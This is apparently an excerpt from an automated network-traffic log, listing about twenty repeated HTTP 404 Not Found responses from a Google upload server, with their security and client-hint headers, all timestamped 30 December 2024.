                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qSo2eWnQVRGGSs6Nd4z5cyzrXMkCxLJ6jBB7LVu4A9e4A40V4f6VbAbscLz5-I1hvMU-T3WoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UVVVf8XLAMoyvuA2LbwP4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6piQqX4YpAYSnGK5rmpf9m-AiYJzujFWjmJ5R0iXX-Iqrg4Gdojq1JH_FCsWMVcsIzGlPYdCgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-e1U2MPuRcfP1zzin763k-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5e2vE356ToewocaN3t2l_I36XsW71uHFHmBre1Hzxf4yI-4zSDBaQAhgIVPx7bU1T6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Hg8rX6lgkU-loeZeSn9YQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7O_8nEjWJNdlLNBRnMeU0HqhuwwvBAPvnwCzWY937eobRlfBbBXOk1Adou5ymE5mXYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-e4Pt5PPV8v-pX8X7T0NJBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hhvi7_59EzkaTic7-WNeViVn_GBQ7zNZNPjZi73WniYXacej0UiEaqHiLIAX6O0w6n9YSd-YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qE-R7FGhhX0v1n7xfM2l-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4pVFpQkvf6F1lnoeKm562fqYMq2R5x1eJ-M76LoHGQOfTsXGH0QqipvmbVMOUWcZMEYGXl1zMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oeNJ12oSFSzqqjzP8VnfCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5CQOS6CqRfeUnv0GsHroGTZKWMzwvGwSq4i9iUCl5hIt9S9kBNrxNKP0ntknV85b38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DxIqZbV88PZzPTAOJL9OAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Y7DTRfb37wmeygo-osyZHOQC6LdETDiKai0i-MnQRYumN4Y7ly3Rr01zS_bbNp35uContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-2Ma45EpewXIetwEGGQiNbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DXWhOdjjGpH5Ee5m4wo3Ijp5Eb1wwTt2GJn2YbdCEDhw_h4yCTeVz8ZpDipIccCqIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kbXeYQMNDWpQuSBDYTZssA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DCxlNerWapFpc1sWBylio5fQTsLIyRTppP6zJDM6KOmmDhFN1fD74vrK87aKJ2ku1J60Q79MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Na5BI9FdRkLEuNQ1IaNykw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5D8s9HxmvRkEX0pER7nT_KDVZ40S1TIcqBlNV8dh3kWmnCCoFV5Krjhsd0YLqZY7p2DTaQ6GAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:39 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yoGInZjpuifgIy7IDqluTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7HLcXAnLhbSjbjNmiLiZhqJCAW3apfWCgKID1LuO7mF3_MvUaK-Kv2rckeaxxHGTNzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WuPte8BSiBUZM7b3U4OdDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6s-smCQ2SFdiS79T0-Ml63D3J7vPBoZHg5H51upU3KPsEyt0nZLwxm2HA-WKo_PEAnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-hMGxaJ4cc4xrVKianJBeGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4P9dcb7zks9tzVGlzBslFDu6BY9eKd5ugppUK_SfkWdjlEfBfxKotPXYzIVfordHgIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mFVecKSr9t1hr-4WwhYNCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65jHHTHh9eGjuIguwqO6r9vMh8tKJyuafVV16hH_xhzg1rpKmMxk3ig1CSd65hA4fOEEDosaAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-i5yUbJkJkp540OPeLVqMnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lEiPWnEutgnpaJ-M4i2D5Tj9vFe-mE9RkRX4dlnLgyXYbjCQc28rEzi2ZhwbVNLJolkFpow4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:43 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-s3x3kMhVWRMJKk_KoXwoiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6HjS2LZhbcGPSGowaIXzbvS8zp4gPuvoQKlvUQ23kkfXHyIJnqznf9M1CXb5K5ENDs2IFV7EQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HjljMUQ8JXEj-YAHg7kWKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7RU4jWpoOyq_fvQkvx9X4v_z6GEQ9DAelptv-f2qz1GSlQmX6vqFwkTqkqFDXKAd3ZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-lGU5AHtUqSZmJzuePf6TUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6c0TIrRIk97t1Jr611uUny5uSNuUGcyNuIlKJJeaJKY4IlmsnldZSc2kBN1i2n24VkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-xj94ZCwTsxwd-CI2ClAkIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7UJy_zeg5-NKA4jWQbWcGO8KUIvoCdJzPazZN9BF5w-N73znTyO2WAMErNBDPnjDc6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wQQ9xDOQtK9h_I33uXQtrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
